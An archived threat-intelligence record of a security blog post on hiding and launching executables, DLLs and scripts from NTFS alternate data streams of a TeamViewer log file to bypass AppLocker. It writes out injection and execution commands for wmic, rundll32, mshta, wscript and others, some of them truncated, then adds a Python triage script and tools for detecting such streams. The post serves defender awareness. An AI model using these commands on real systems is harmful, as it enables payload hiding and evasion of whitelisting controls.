{
	"id": "10994bb8-6c35-4caf-887c-f314367d31b5",
	"created_at": "2026-04-06T00:21:09.217573Z",
	"updated_at": "2026-04-10T13:11:19.062407Z",
	"deleted_at": null,
	"sha1_hash": "88f3b8ccf7c65faaca8c2d06e2aa814fff3bd2f9",
	"title": "Putting data in Alternate data streams and how to execute it",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 824158,
	"plain_text": "Putting data in Alternate data streams and how to execute it\r\nPublished: 2018-01-14 · Archived: 2026-04-05 19:38:01 UTC\r\nPart 2 of this research can be found here: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/\r\nI have always had a fascination with ADS (Alternate Data Streams) and using them as part of persistence. My first encounter with ADS as a persistence technique was when Matt Nelson aka @Enigma0x3 wrote a blog post about using it: https://enigma0x3.net/2015/03/05/using-alternate-data-streams-to-persist-on-a-compromised-machine/\r\nQuite recently I have started to play with AppLocker bypasses to create a tool, and somehow I saw a shiny thing that I just had to look at. I did a normal check on my AppLocker test system using Accesschk.exe and discovered a writable file within the TeamViewer folder. A log file, to be exact. This led me to the discovery that you can inject data into an alternate stream of that file, execute it, and it will work as an AppLocker bypass. The log file lives under Program Files, which the default AppLocker path rules allow, and a stream shares the path of its host file, so a path-based policy treats the stream like the log file itself.\r\nI posted a tweet about this here: https://twitter.com/Oddvarmoe/status/951757732557852673\r\n(Kudos to TeamViewer for looking into the issue from their side.)\r\nHere is a screenshot of the bypass I found:\r\nSo what I did was that I first injected the payload into the ADS of the log file using this command:\r\nhttps://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/\r\nPage 1 of 6\n\ntype c:\\temp\\bginfo.exe \u003e \"C:\\program files (x86)\\Teamviewer\\TeamViewer12_Logfile.log:bginfo.exe\"\r\nThen I used the following command to execute it:\r\nwmic process call create '\"C:\\program files (x86)\\Teamviewer\\TeamViewer12_Logfile.log:bginfo.exe\"'\r\nAfter I was done looking at this bypass I got even more curious. 
What sort of other processes are able to execute from ADS?\r\nI did some Googling around ADS and found out that back in the day you could use:\r\nstart c:\\folder\\file.exe:ADSStream.exe\r\nto launch executables from ADS. This is now blocked.\r\nAfter some testing, searching and playing around I found that at least the following can execute from ADS (and I am sure there are hundreds more):\r\nrundll32.exe\r\ntype \"C:\\temp\\messagebox64.dll\" \u003e \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer13_Logfile.log:ADSDLL\r\nrundll32 \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer13_Logfile.log:ADSDLL.dll\",DllMain\r\nMavinject.exe\r\nThe sequence here is: start the 32-bit notepad, look up its PID with tasklist, write the DLL into the stream, and hand the stream path to the WoW64 copy of mavinject.exe (the final mavinject command is cut off in the archived screenshot text).\r\nc:\\windows\\SysWOW64\\notepad.exe\r\ntasklist | findstr notepad\r\ntype C:\\temp\\AtomicTest.dll \u003e \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer13_Logfile.log:Atomic.dll\r\nC:\\windows\\WinSxS\\wow64_microsoft-Windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e\r\nForfiles.exe\r\nIn my testing forfiles is not very fond of spaces in paths. 
So it seems you have to use the 8.3 short folder name for some reason.\r\nforfiles /P C:\\windows\\system32 /m notepad.exe /c \"c:\\Progra~2\\Teamviewer\\TeamViewer13_Logfile.log:bg\r\nWscript.exe\r\ntype \"C:\\Program Files\\test\\wscripthello.vbs\" \u003e \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer13_Logfi\r\nwscript \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer13_Logfile.log:wscripts.vbs\"\r\nCscript.exe\r\ncscript \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer13_Logfile.log:wscripts.vbs\"\r\nMSHTA.exe\r\ntype C:\\temp\\helloworld.hta \u003e\r\nwscript\"C:\\Program Files (x86)\\TeamViewer\\TeamViewer13_Logfile.log:hel\r\nmshta \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer13_Logfile.log:helloworld.hta\"\r\nI am pretty sure this is not everything that can execute from ADS. These are just some examples I found pretty fast while playing with it. My point with this post is to raise awareness of Alternate Data Streams. If you are not checking for malicious activity within the ADS of your files and folders, I suggest you start. That's it.\r\nUpdate 18.01.2018:\r\nI added these methods to a Gist found here: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\r\nWill try to keep it updated when I discover new methods.\r\nI was also asked a lot about how to detect these alternate data streams. 
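As an added example for the detection question and for the advice above to start checking ADS for malicious activity (my code, not from the original post or from any tool it links), the script below triages saved dir /R /S output offline. It keeps every named stream, drops the Zone.Identifier mark-of-the-web stream that downloaded files normally carry, and flags stream names whose extension is something the launchers in this post (wmic, rundll32, wscript, cscript, mshta, forfiles, mavinject) will run. The listing it parses is constructed to mirror the TeamViewer log-file case, and the extension list is my assumption rather than a complete one.

```python
'''Offline triage of NTFS alternate data streams from saved `dir /R /S` output.

Added example for this post; not code from the original article. cmd.exe prints
a named stream as an indented line holding only its size and
<file>:<stream>:$DATA directly under its host file, so the parser only needs to
track the current directory header and match those lines.
'''
import ntpath
import re
from dataclasses import dataclass

# Extensions matching the launchers shown in the post (wmic/rundll32/wscript/
# cscript/mshta/forfiles/mavinject). Assumed list; extend it for your estate.
EXECUTABLE_STREAM_EXTENSIONS = {'.exe', '.dll', '.vbs', '.js', '.hta', '.ps1', '.bat', '.cmd'}

# Stream lines are indented and end in ':$DATA'; ordinary file lines start with
# a date in column 0, so the leading-space anchor keeps them out.
STREAM_LINE = re.compile('^ +(?P<size>[0-9.,]+) +(?P<file>[^:]+):(?P<stream>[^:]+):[$]DATA *$')
DIRECTORY_LINE = re.compile('^ *Directory of (?P<path>.+?) *$')


@dataclass(frozen=True)
class StreamHit:
    path: str         # host file, joined with the directory header it sat under
    stream: str       # stream name without the :$DATA suffix
    size: int         # bytes, thousands separators stripped
    suspicious: bool  # True when the stream extension is one the launchers run


def parse_dir_r(listing):
    '''Return one StreamHit per named stream, skipping Zone.Identifier.'''
    hits = []
    current_dir = ''
    for line in listing.splitlines():
        header = DIRECTORY_LINE.match(line)
        if header:
            current_dir = header.group('path')
            continue
        m = STREAM_LINE.match(line)
        if not m:
            continue
        stream = m.group('stream')
        if stream == 'Zone.Identifier':
            continue  # mark-of-the-web; expected on anything a browser downloaded
        size = int(m.group('size').replace(',', '').replace('.', ''))
        ext = ntpath.splitext(stream)[1].lower()
        hits.append(StreamHit(path=ntpath.join(current_dir, m.group('file')),
                              stream=stream, size=size,
                              suspicious=ext in EXECUTABLE_STREAM_EXTENSIONS))
    return hits


def suspicious_streams(listing):
    '''Only the hits whose stream name carries an executable extension.'''
    return [h for h in parse_dir_r(listing) if h.suspicious]


def report(listing):
    '''One line per hit, SUSPICIOUS entries first so they stand out in a long listing.'''
    lines = []
    for h in sorted(parse_dir_r(listing), key=lambda hit: not hit.suspicious):
        flag = 'SUSPICIOUS' if h.suspicious else 'review'
        lines.append(f'{flag:10} {h.path}:{h.stream} ({h.size} bytes)')
    return lines


# Constructed sample listing (not captured from a real host): the TeamViewer log
# file from the post with two injected streams, and a downloads folder with the
# benign Zone.Identifier stream plus a harmless text stream. Paths are built with
# ntpath so the sample needs no backslash escapes.
DIR_TEAMVIEWER = ntpath.join('C:' + ntpath.sep, 'Program Files (x86)', 'TeamViewer')
DIR_DOWNLOADS = ntpath.join('C:' + ntpath.sep, 'Users', 'user', 'Downloads')
SAMPLE_LISTING = ''' Volume in drive C has no label.

 Directory of {tv}

14.01.2018  10:22    <DIR>          .
14.01.2018  10:22    <DIR>          ..
14.01.2018  10:20           123,456 TeamViewer13_Logfile.log
                            921,600 TeamViewer13_Logfile.log:bginfo.exe:$DATA
                              1,024 TeamViewer13_Logfile.log:wscripts.vbs:$DATA
               1 File(s)        123,456 bytes

 Directory of {dl}

14.01.2018  09:00            17,408 readme.txt
                                 26 readme.txt:Zone.Identifier:$DATA
14.01.2018  09:05             4,096 notes.txt
                                512 notes.txt:comment.txt:$DATA
               2 File(s)         21,504 bytes
'''.format(tv=DIR_TEAMVIEWER, dl=DIR_DOWNLOADS)

if __name__ == '__main__':
    for line in report(SAMPLE_LISTING):
        print(line)
```

Run dir /R /S against the drive on the host, redirect the output to a text file, and feed that file's contents to parse_dir_r. Anything flagged SUSPICIOUS deserves a look at the stream contents before it is written off, and the review lines surface streams with extensions the list does not cover, which is where a renamed payload would hide.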
There are several utilities to view ADS.\r\nDir /r c:\\fileorfolder\r\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/streams\r\nhttps://www.nirsoft.net/utils/alternate_data_streams.html\r\nSysmon also offers some monitoring of ADS AFAIK.\r\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/sysmon\r\nhttps://twitter.com/SwiftOnSecurity/status/952659933836791808\r\nThere are also some PowerShell scripts that can be used.\r\nhttps://github.com/forgottentq/powershell/blob/master/find-steams.ps1\r\nhttps://github.com/p0shkatz/Get-ADS\r\nCheers!\r\nUpdate 29.08.2018:\r\nAnother great resource on ADS written by Marc Ochsenmeier can be found here: https://winitor.com/pdf/NtfsAlternateDataStreams.pdf\r\nSource: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/"
	],
	"report_names": [
		"putting-data-in-alternate-data-streams-and-how-to-execute-it"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434869,
	"ts_updated_at": 1775826679,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/88f3b8ccf7c65faaca8c2d06e2aa814fff3bd2f9.pdf",
		"text": "https://archive.orkl.eu/88f3b8ccf7c65faaca8c2d06e2aa814fff3bd2f9.txt",
		"img": "https://archive.orkl.eu/88f3b8ccf7c65faaca8c2d06e2aa814fff3bd2f9.jpg"
	}
}